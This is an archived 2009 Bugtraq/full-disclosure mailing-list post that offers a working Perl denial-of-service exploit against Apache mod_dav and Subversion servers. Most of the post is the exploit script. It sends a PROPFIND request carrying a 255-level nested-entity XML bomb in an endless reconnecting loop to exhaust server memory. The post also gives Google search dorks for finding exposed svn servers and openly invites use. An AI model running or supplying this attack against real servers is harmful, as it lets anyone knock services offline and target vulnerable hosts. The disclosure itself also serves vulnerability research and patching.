The father of all bombs - another webdav fiasco

To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: The father of all bombs - another webdav fiasco
From: Kingcope <kcope2@xxxxxxxxxxxxxx>
Date: Mon, 1 Jun 2009 22:46:20 +0200
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=GtkBPxQ3n6/aphnx1hMPCFviNzkp2eRJ0xB7nYby5cs=; b=WxykaUsCjYys3WilKpkGXJLFxzgzXfUt2oJ9Hnu4rIpHWApZuszBAlA8l1d+QKLbOV cip2Y61QzzJPDdnRXC1X8zxxWEitwKd3j0vOYSBFbuZazRmfs1DYnpoMBDgSGxZsEJt6 B2zwJgrDEZEtgCDpWOdxdjUoMyVu9R6FtNAa0=
Domainkey-signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=u75KFNgVTY8j1s3y7LvE0hqJCH9RxjRjtZ/QI3Q04/4V8un0a6SU3XZ9QOAmoEd+kp eoIvAK13/44cAPE9BB/g0Ptq6oG0knyKG9lxngKwaKmXAEsgv0JCeEbao6uUkZPptQ27 zTgIa/9HHiTCX8339OGVlvEh5ur4OwMUk1eaM=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Apache mod_dav / svn Remote Denial of Service Exploit

Google Dorks:
inurl:svn inurl:trunk
"powered by subversion version"

Information on the bug (XML Bomb):
http://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/

Enjoy!

-------------------------------------------------------------------
###apache-ied.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
        print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
        print "by kcope in 2009\n";
        print "usage: perl apache-ied.pl <remotehost> <webdav folder>
[username] [password]\n";
        print "example: perl apache-ied.pl svn.XXX.com /projects/\n";exit;
}

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];

$username = $ARGV[2];
$password = $ARGV[3];

$|=1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuth\r\n";      
}
print $sock "\r\n";
$x = <$sock>;   

print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
        print;  
}
close($sock);
 print "No PROPFIND on this server and path.\n";
 exit(0);       
}

$a = "";
for ($i=1;$i<256;$i++) {                # Here you can increase the XML bomb 
count
        $k = $i-1;
        $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}

$igzml =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ELEMENT REMOTE ANY>\n"
."<!ENTITY x0 \"b4bew1thb1gb00bs\">\n"
.$a
."]>\n"
."<REMOTE>\n"
."&x$k;\n"
."</REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack...\n";

$ExploitRequest =
 "PROPFIND $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n"
."Depth: 0\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";       
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length:
".length($igzml)."\r\n\r\n" . $igzml;

while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp') || (goto again);

print $sock $ExploitRequest;
print ";Pp";
}

Prev by Date: Re: (Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6-->
Next by Date: Re: Re: (Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6-->
Previous by thread: [USN-778-1] cron vulnerability
Next by thread: Secunia Research: Apple QuickTime MS ADPCM Encoding Buffer Overflow
Index(es):
- Date
- Thread